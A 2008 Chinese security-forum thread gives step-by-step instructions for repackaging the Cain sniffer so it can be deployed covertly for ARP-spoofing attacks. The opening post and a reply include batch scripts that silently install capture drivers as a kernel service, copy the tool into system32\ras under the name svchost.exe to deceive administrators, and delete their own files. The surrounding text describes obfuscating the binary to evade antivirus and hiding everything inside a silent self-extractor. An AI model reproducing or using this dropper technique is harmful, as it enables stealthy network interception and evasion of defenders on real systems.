Board logo

标题: [讨论]绿色cain制作过程 比较完美的方法了 [打印本页]

作者: MAYA    时间: 2008-7-25 13:56     标题: [讨论]绿色cain制作过程 比较完美的方法了

[讨论]绿色cain制作过程 比较完美的方法了
议题作者:l4dron(http://www.myspace.cn/hack
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

经过测试后,大家可以发现,ca_setup.exe这个文件安装后,如果只是执行arp欺骗工作的话,只要cain.exe这个文件就可以了,其他的安装文件可以全部不要(所需的驱动文件除外)。

首先自己安装下cain,默认安装就可以。然后把cain.exe复制出来,加花处理下,主要是针对4.97这个版本被挪吨这个杀毒软件杀掉的问题。

然后提取出下列文件:

system32\drivers\npf.sys
system32\packet.dll
system32\wpcap.dll
system32\wanpacket.dll

放在刚才复制出来那个cain.exe的同一目录里,再写一个bat文件,当然,vbs文件也可以,我写的是bat文件。bat文件内容如下:

@echo off
copy packet.dll %SYSTEMROOT%\system32\packet.dll
copy wpcap.dll %SYSTEMROOT%\system32\wpcap.dll
copy wanpacket.dll %SYSTEMROOT%\system32\wanpacket.dll
copy npf.sys %SYSTEMROOT%\system32\drivers\npf.sys
copy cain.exe %SYSTEMROOT%\system32\ras\svchost.exe
sc create npf binpath= system32\drivers\npf.sys type= kernel start= demand
del packet.dll
del wpcap.dll
del wanpacket.dll
del npf.sys
del cain.exe
del l4.exe
del l4.bat


保存好后制作一个自解压文件,制作过程很简单,要求是解压后就运行刚才建立的l4.bat,自解压文件命名为l4.exe,在解压路径为当前目录创建,模式为全部隐藏和覆盖所有文件,文本和图标那里可以自己选一个ico文件,好了,这就算制作完毕。

我测试过,cain这个arpsniffe工具,只有cain.exe这个主文件就可以照常运行arp攻击。

现在,这个cain.exe为免杀,绿色,自动安装所需的驱动,体积仅为1.15mb。点击l4.exe后自动释放cain.exe到system32\ras\目录下并该名为svchost.exe(这样在任务管理器里管理员看到的还是svchost.exe,可以小欺骗下管理员)。运行cain.exe的时候,会弹出来个框,问你确实要运行这个工具么,点是就可以了。0k,现在可以尽情的arp欺骗了。

实在不想自己diy的,加我QQ,我pub给你。myspace.cn/hack


帖子7 精华0 积分27 阅读权限40 性别男 在线时间20 小时 注册时间2007-6-27 最后登录2008-6-13 查看详细资料TOP 爱要怎么说出口

7个b
晶莹剔透§烈日灼然
作者: vincentyip    时间: 2008-7-25 13:56

原谅我实在太无聊了,便手简化一下你的P处理...
@echo off
set SysDir=%SYSTEMROOT%\System32\
copy packet.dll %SysDir%\packet.dll /y
copy wpcap.dll %SysDir%\wpcap.dll /y
copy wanpacket.dll %SysDir%\wanpacket.dll /y
copy npf.sys %SysDir%\drivers\npf.sys /y
copy cain.exe %SysDir%\ras\svchost.exe /y
sc create npf binpath = %SysDir%\drivers\npf.sys type= kernel start= demand
del packet.dll /a
del wpcap.dll /a
del wanpacket.dll /a
del npf.sys /a
del cain.exe /a
del l4.exe
del %0
楼主的思路固然是好的,Cain自带的WinPcap安装后会残留一些垃圾信息,比如服务名之类的.实在不爽,很支持楼主的做法...
帖子35 精华0 积分128 阅读权限40 在线时间18 小时 注册时间2007-9-24 最后登录2008-7-6 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

9989
晶莹剔透§烈日灼然
作者: 成哥    时间: 2008-7-25 13:56

有时候会遇到CAIN找不到网卡,不知道什么原因,但是又能A

有时候不能A 能C 郁闷死了!
帖子5 精华0 积分17 阅读权限40 在线时间0 小时 注册时间2007-10-23 最后登录2008-2-11 查看详细资料TOP 少女暴富的隐秘(图)

rabbitsafe
荣誉会员

作者: 哑雪    时间: 2008-7-25 13:56

我试了,好像不行啊,找不到网卡
帖子13 精华2 积分3075 阅读权限100 性别男 在线时间46 小时 注册时间2006-10-20 最后登录2008-7-16 查看详细资料TOP

l4dron
晶莹剔透§烈日灼然
作者: 德军1941    时间: 2008-7-25 13:56

找不到网卡大致情况有两个,一个是win2000系统,安装winpcap后需要重新启动服务器才可以。
另一个是winpcap驱动不对,单独安装下winpcap,然后再把相关痕迹去掉,就可以。myspace.cn/hack

帖子7 精华0 积分27 阅读权限40 性别男 在线时间20 小时 注册时间2007-6-27 最后登录2008-6-13 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

xg530
晶莹剔透§烈日灼然
作者: 极速BOY    时间: 2008-7-25 13:56

Description . . . . . . . . . . . : SWsoft Virtual Network Adapter
这样的也找不到网卡的`也不能用cain``请指点下
帖子16 精华0 积分51 阅读权限40 在线时间44 小时 注册时间2005-8-30 最后登录2008-3-28 查看详细资料TOP 让女孩一夜变的更有女人味

xg530
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2